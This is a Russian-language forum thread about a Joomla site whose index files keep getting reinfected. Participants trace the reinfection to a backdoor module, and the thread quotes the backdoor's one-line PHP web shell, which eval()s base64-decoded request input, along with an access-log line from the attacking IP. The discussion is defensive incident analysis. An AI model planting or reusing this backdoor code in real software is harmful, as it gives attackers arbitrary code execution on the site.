[voffka_m]

Добрый день коллеги, вчера столкнулся с вирусом на сайте. Вирус изменяет файлы с именами index.php и index.html и при этом дата изменения файла не меняется. В начале файла дописывается код следующего содержания:

Изменение пароля от Cpanel, FTP, Mysql положительного результата не принесло, вирус снова появляется по пришествию некоторого не продолжительного времени. Компьютер на вирусы проверялся все чисто, так же прибывал чистить с другого компьютера, вирус все равно возвращается, cайт работает на Joomla 1.7.3.

Кто сталкивался с аналогичным вирусом, если не трудно поделитесь информацией, как была решена данная проблема.

[G00D]

проверяйте файлы на хостинге на наличие shell'a

[furian]

а проверка яндекса на вредоносный код ничего не дает? проверь, может чего найдет

[voffka_m]

furian,да яндекс находил вредоносный код. Но только зараженные файлы index.php и index.html

Изучение логов дало такой результат.

По данному адресу /modules/mod_tools_pack/mod_tools_pack.php отправлялся POST запрос, что именно в нем было не знаю но файл содержал всего одно строку:

PHP код:

$_REQUEST[e] ? eVAl( base64_decode( $_REQUEST[e] ) ) : exit; 


Ответ нашелся быстро - http://www.dataprotectioncenter.com/...lspack-plugin/

Если перевести и выделить главное то - это бэкдор, который позволяет атакующему выполнить любой код на вашем сайте.

Самое интересное что это гадость используется на Wordpress, как он попало в Joomla это вопрос.

Обращение к серверу выглядит вот так:

83.69.224.216 - - [14/Mar/2012:06:05:40 -0400] "POST /modules/mod_tools_pack/mod_tools_pack.php HTTP/1.0" 200 1 "-" "Mozilla/4.76 [en] (Win98; U)"

[sw04]

появился подобный код на одном из vds 6.03.12 , источник взлома - установленный wordpress 3.1 без обновлений с ноября прошлого года. В подробности пока не вникал, сохранил логи.
месяца 2 назад была история про похожий вирус на хабре.

[Zvеr]

Удалил код из первого поста.